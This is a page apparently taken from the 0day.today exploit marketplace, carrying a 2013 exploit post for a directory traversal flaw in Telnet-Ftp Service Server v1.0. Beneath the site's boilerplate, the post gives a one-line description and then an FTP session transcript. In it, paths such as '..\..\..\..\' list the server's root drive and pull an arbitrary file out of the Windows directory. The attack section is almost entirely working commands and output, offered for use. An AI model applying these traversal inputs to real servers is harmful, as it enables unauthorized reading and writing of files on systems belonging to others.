0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Telnet-Ftp Service Server 1.0 Directory Traversal
# Exploit Title: Telnet-Ftp Service Server v1.0 Directory Traversal Vulnerability # Date Published: 2013/6/18 # Exploit Author: Chako # Software Link: http://telnet-ftp-server.en.softonic.com/ # Version: v1.0 (Build 1.218) # Tested on: Windows Xp SP3 English Description: ===================== A vulnerability has been identified in Telnet-Ftp Service Server v1.0, which allows attackers to read or write arbitrary files. Exploit: ===================== 220 FTP Server ready. Telnet-Ftp Server v. 1.0 (Build 1.218) User (127.0.0.1:(none)): chako 331 Password required for chako. Password: 230 User chako logged in. ftp> dir ..\..\..\..\ 200 Port command successful. 150 Opening data connection for directory list. drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 WINDOWS drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Documents and Settings dr--r--r-- 1 ftp ftp 0 Jun 12 2012 Program Files -rw-rw-rw- 1 ftp ftp 0 Jun 12 2012 CONFIG.SYS -rwxrwxrwx 1 ftp ftp 0 Jun 12 2012 AUTOEXEC.BAT drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Python27 drw-rw-rw- 1 ftp ftp 0 Jun 12 2012 Perl drw-rw-rw- 1 ftp ftp 0 Sep 07 2012 eb83393ec0d8ee1eab4b219f drw-rw-rw- 1 ftp ftp 0 Jun 08 10:55 Win32 drw-rw-rw- 1 ftp ftp 0 Jun 08 12:46 tool drw-rw-rw- 1 ftp ftp 0 Jun 08 16:51 New Folder drw-rw-rw- 1 ftp ftp 0 Jun 08 23:22 TYPSoft FTP Server -rw-rw-rw- 1 ftp ftp 9 Jun 18 00:03 END -rw-rw-rw- 1 ftp ftp 0 Jun 18 00:04 Documents 226 File sent ok ftp: 933 bytes received in 0.00Seconds 933000.00Kbytes/sec. ftp> get ..\..\..\..\windows\hack.txt 200 Port command successful. 150 Opening data connection for ..\..\..\..\windows\hack.txt. 226 File sent ok ftp: 14 bytes received in 0.00Seconds 14000.00Kbytes/sec. ftp> !type hack.txt Hello~ World!~ftp> # 0day.today [2024-11-16] #